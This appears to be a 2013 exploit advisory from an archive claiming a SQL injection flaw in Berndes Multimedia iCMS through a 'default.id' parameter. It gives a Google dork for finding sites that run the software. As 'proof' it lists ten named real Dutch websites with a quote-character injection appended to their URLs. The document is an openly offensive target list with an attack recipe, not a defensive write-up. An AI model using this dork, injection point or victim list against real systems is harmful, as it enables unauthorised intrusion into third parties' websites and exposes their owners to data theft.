Berndes Multimedia iCMS suffers from a remote SQL injection vulnerability. Note that this advisory has site-specific information.
2f6330dbaa1f18ed2b288706110441e9
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [/] Exploit Title: Berndes Multimedia iCMS Sql Injection
Vulnerability
|
| [\] Exploit Author: Ashiyane Digital Security Team
|
| [/] Software Link : http://www.berndesmultimedia.nl
|
| [\] Google Dork: intext:"powered by Berndes Multimedia iCMS"
|
| [/] Tested on: Windows,Linux
|
| [\] Date : 2013/09/13
|-------------------------------------------------------------------------|
| [\] Exploit: Sql Injection
| [/] Location : [Target]l/default.id=[Sql
Injection]
|-------------------------------------------------------------------------|
| [/] Proof:
|
| [\] http://www.askoi.nl/default.id='
|
| [/] http://www.boikon.nl/default.id='
| [\] http://www.battlestars.nl/default.id='
|
| [/] http://www.dgtomassentransport.nl/default.id='
|
| [\] http://www.fraai-buiten.nl/default.id='
|
| [/] http://www.jongdementerend.nl/default.id='
|
| [\] http://www.vijfdeverloting.nl/default.id='
|
| [/] http://www.seniorenwegwijzer.nl/default.id='
|
| [/] http://www.vredewold.nl/default.id='
|
| [\] http://www.kamp-bouwadvies.nl/default.id='
|-------------------------------------------------------------------------|
| [/] Discovered By :
ACC3SS
|-------------------------------------------------------------------------|
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
Comments
Subscribe to this comment feedNo comments yet, be the first!